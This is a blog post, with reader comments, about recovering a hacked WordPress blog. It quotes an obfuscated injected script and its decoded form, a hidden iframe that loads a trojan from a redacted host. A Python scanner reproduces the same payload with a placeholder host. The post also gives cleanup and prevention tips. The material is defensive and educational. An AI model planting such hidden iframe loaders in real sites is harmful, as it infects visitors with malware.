Have You Ever Been Hacked? Simple Mistakes to Avoid & How to Recover

WordPress is the most popular blogging platform in the world, with over 6 million downloads so far (see why I like WordPress here), and because it’s so popular, you know the bad guys will begin to target its users. Hacking is a very serious issue that can cripple any website and erase a hard-earned source of income, especially for the unsuspecting. Many of us have never witnessed the devastating effects that malicious scripts can have on a website, so I’m going to show you an example of what happens when hackers attack and how to deal with it.

Fortunately, I have never been hacked, so I will be showing an example from another person’s experience that I came across yesterday. Below is a screenshot of his WordPress dashboard 2 months after the malicious script was installed.

Hacked WordPress Screenshot

As you can see, everything’s all mixed up. When he tried to visit his blog through his web browser, his anti-virus software popped up with warnings that a trojan horse was found on the site and that the site may be dangerous. This is when he realized that something had gone wrong: after the damage was already done.

The Malicious Code

He then decided to check his theme’s HTML files to find the source of the problem, and there he found some code that he did not recognize because the malicious code was obfuscated with percent-encoding. Example below:

<script language="javascript">eval(unescape("%64%6F%63%75%6D%65

The hackers obviously encoded part of the line of code, hoping to hide the true nature and purpose of the script. When decoded, the code reads as follows:

<script language="javascript">eval(unescape("document.write('<iframe src="http://xxxxxxxx.org/in.php" width=1 height=1 frameborder=0></iframe>');"))</script>

The script was actually trying to load a malicious website inside his website through a hidden frame. This website would automatically load a trojan horse virus in his browser.
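An added example, not code from the original post: a small Python scanner that looks for the eval(unescape("%..")) pattern shown above, decodes the payload the way the browser would, and reports any near-invisible iframe it writes. The function names, the 0/1-pixel "hidden" threshold, the sample file content and the host malicious.example are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# eval(unescape("...")) with straight or typographic quotes around the payload
EVAL_UNESCAPE = re.compile(r'''eval\s*\(\s*unescape\s*\(\s*["'“‘]([^"'”’)]*)''', re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r'''\b(src|width|height)\s*=\s*["']?([^"'\s>]+)''', re.I)
SUFFIXES = {".php", ".html", ".htm", ".js"}

def js_unescape(payload):
    """Mimic JavaScript unescape(): %uXXXX and %XX each become one character."""
    payload = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), payload)
    return unquote(payload, encoding="latin-1")

def frame_info(tag):
    """Return (src, hidden); hidden means a 0- or 1-pixel width or height."""
    attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
    hidden = any(attrs.get(k, "").rstrip("px") in {"0", "1"} for k in ("width", "height"))
    return attrs.get("src"), hidden

def scan_text(text):
    """Return one finding per eval(unescape(...)) call, with its decoded payload."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(text):
        decoded = js_unescape(m.group(1))
        findings.append({"line": text.count("\n", 0, m.start()) + 1, "decoded": decoded,
                         "iframes": [frame_info(t) for t in IFRAME.findall(decoded)]})
    return findings

def scan_tree(root):
    """Scan web files under root (theme and plugin folders); return {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: a footer template with one injected line (placeholder host).
PLAIN = ("document.write('<iframe src=\"http://malicious.example/in.php\" "
         "width=1 height=1 frameborder=0></iframe>');")
SAMPLE = ('<?php get_footer(); ?>\n<script language="javascript">eval(unescape("'
          + "".join("%%%02X" % ord(c) for c in PLAIN) + '"))</script>\n')

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

Run scan_tree against a downloaded copy of the site's files rather than the live server, and treat a clean result as "this pattern was not found", not as proof the site is clean.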

How Did The Script Get in the HTML for his Blog?

The next question is: how did this malicious code get into his blog in the first place? Answer: a virus on his local Windows PC stole his FTP login credentials from his FTP client and then used the FTP client to remotely infect the site, since he used FTP to directly access his blog’s directories. Typically, the PHP files with execute permission within those directories are the ones infected, and the plugin and theme files are the first targets.

The Solution

Here are some steps to take to remove an infestation:

1) Ensure that you have robust, up-to-date anti-virus software on your PC. Run a complete scan of your entire computer system and ensure that all viruses are removed. I would recommend downloading Malwarebytes’ Anti-Malware Software to complement your anti-virus software. This works very well.

2) In this scenario, it was only the default WordPress PHP files that were affected, so a fresh copy of the files was uploaded after removing the malicious ones from the hosting server.

3) Change local FTP passwords and ensure that the new ones are very complex. This is very important to do because normally after a malicious attack there is always an open “backdoor” that remains and the hacker can easily exploit this.

4) To be on the safe side, change your hosting account’s password as well as your site’s database password, whether it is PostgreSQL or MySQL.

PHP & HTML Knowledge

It is very important to know basic HTML and PHP because this will help you recognize suspicious activity and malicious code, and I can’t stress this enough. A site such as Lynda.com provides amazing video tutorials that will definitely help you to grasp the basics and master programming languages if you’re seriously interested. They have helped me a lot.

Prevention is Better Than Cure

You may view a list of plugins and techniques that will help to prevent malicious attacks in one of my previous posts here: 10 Simple Steps to Secure & Protect your WordPress Blog

Some key points that are not in that post are:

1) Do not save your login credentials in your FTP client.

2) Change all passwords on a monthly basis.

3) Be careful when downloading free plugins. It is best to download them from wordpress.org.

4) Keep your anti-virus software updated.

Please note that if your blog gets hacked, the symptoms and the causes may be different from what happened in the scenario described above.

If your WordPress blog gets hacked, don’t panic. Use the following resources to recover your website:

Additional Resources if you Suspect That You May Be Hacked

1) Use Google Webmaster Tools to detect malicious scripts.

2) Post the details of symptoms to the WordPress Community, if you notice any suspicious activities happening in your blog

3) If you decide to clean it up yourself, there is a good list of steps to take, in an article at WordPress.org Codex.

Please note that if your blog or other type of site gets hacked, the symptoms and the causes may be different from what had happened in the scenario I presented.

I hope you found this post helpful and will take the steps to prevent the exploitation of your site / blog.

Discussion: Have you ever been hacked? Leave a comment and tell us of your experiences. If you would like to have a more in-depth discussion on this topic, feel free to contact me through here.

Robyn-Dale Samuda is a Web Developer & Entrepreneur & is CEO of Creative Engine Jamaica - Web Design. He has a passion for the web and loves offering assistance and inspiration whenever possible and does so through Sam's Web Guide. He is also a Writer for the popular blog, Blogging Pro. Follow him on twitter Here

26 Comments on "Have You Ever Been Hacked? Simple Mistakes to Avoid & How to Recover"

  1. Lance Puig says:

    I will definitely look into this. I am currently fixing my other site, the main one… coz after reading this, I now am more convinced that it may have been hacked. Thanks for sharing this post!

    • Sam says:

      Thanks for reading Lance and I’m glad you found it useful.

      It’s a very serious issue, so you could check to see if it’s a case where your site was hacked. Please let me know if you need any help with the site.

  2. Neil Macdonald says:

    Hi Sam,

    Thanks for the information. My site isn’t up yet, but this will definitely help me to be aware, and proactive against hacks.
    Thanks also for the link to Lynda.com. I was looking into learning the basics, C++, and it’s nice to watch a video sometimes.
    See you around.

    Neil

    • Sam says:

      I’m glad the information is helpful. It’s really important to prepare for the unexpected. If you need any help just let me know.

      Lynda.com is a great place to start. They offer video tutorials for everything and are very thorough.

  3. Selurus says:

    Thanks for sharing this info. Saved to delicious for a rainy day.

  4. Awesome info, thank you. It hasn’t happened yet, but you can’t be too careful. :)
    .-= Dennis Edell @ Direct Sales Marketing´s last blog ..Holy Power Outage Batman, Not Again! Yep, Another Two Days Shot to Hell… =-.

  5. Ed says:

    I have just encountered your site. Sweet design and everything. It is exactly like mine.

    • Sam says:

      Thanks for reading Ed and I’m glad you like the design.

      I visited your site and the topics are really very similar to mine. Maybe we can share ideas and exchange guest posts. :) What do you think?

  6. Mike Thomas says:

    Your blog has been recommended to us as an interviewee’s favorite blog!

    We would like to do an interview with you about your blog for Blog Interviewer. We’d like to give you the opportunity to give us some insight on the “person behind the blog.”

    It would just take a few minutes of your time. The interview form can be submitted online here: Submit your interview.

    Best regards,

    Mike Thomas

  7. Thanks for the great post bro! Still I haven’t been hacked… but, when looking at what is happening these days.. we need to take every precaution to safeguard ourselves! If they can hack Google… who are we? :P Bookmarked your post mate! :D
    .-= Pubudu Kodikara´s last blog ..3 Cheers! Our Page Rank Has Been Updated! =-.

  8. Sam says:

    That’s right Pubudu,

    If they can hack Google that means that they could probably slaughter anyone else. The good thing is that we may not be such a hot target as Google is.

    Thanks again for reading! :D

  9. Flippa Chick says:

    It’s also useful to actually backup your files daily. For all of my major (content-rich) websites that require WordPress to run efficiently, I install WP-Backup to email me daily backups of my database file.

    While this won’t prevent my website from being hacked, if indeed it is hacked, I’ll have at least a week’s worth of backups to help me get started back on the right track.

    • Sam says:

      That’s right Flippa Chick!

      Having a backup is the safest and most reliable contingency plan if your site gets hacked. It’s like a “get out of jail free card” :)

      Thanks for reading. :)

  10. No, I have never been hacked before. And, I’m somewhat offended by that. No one thought enough of my site to try and destroy it. :(

    C’mon hackers. Show my site some love. J/K
    .-= Chuck Edwards@Weight Loss Blog´s last blog ..The Special K Diet and Challenge =-.

  11. PJ Bess says:

    Hey Sam,

    Great post. I have to check this out! This is the first I have been here so I will be back for sure. Nice design too. Keep up the good work.

    PJ
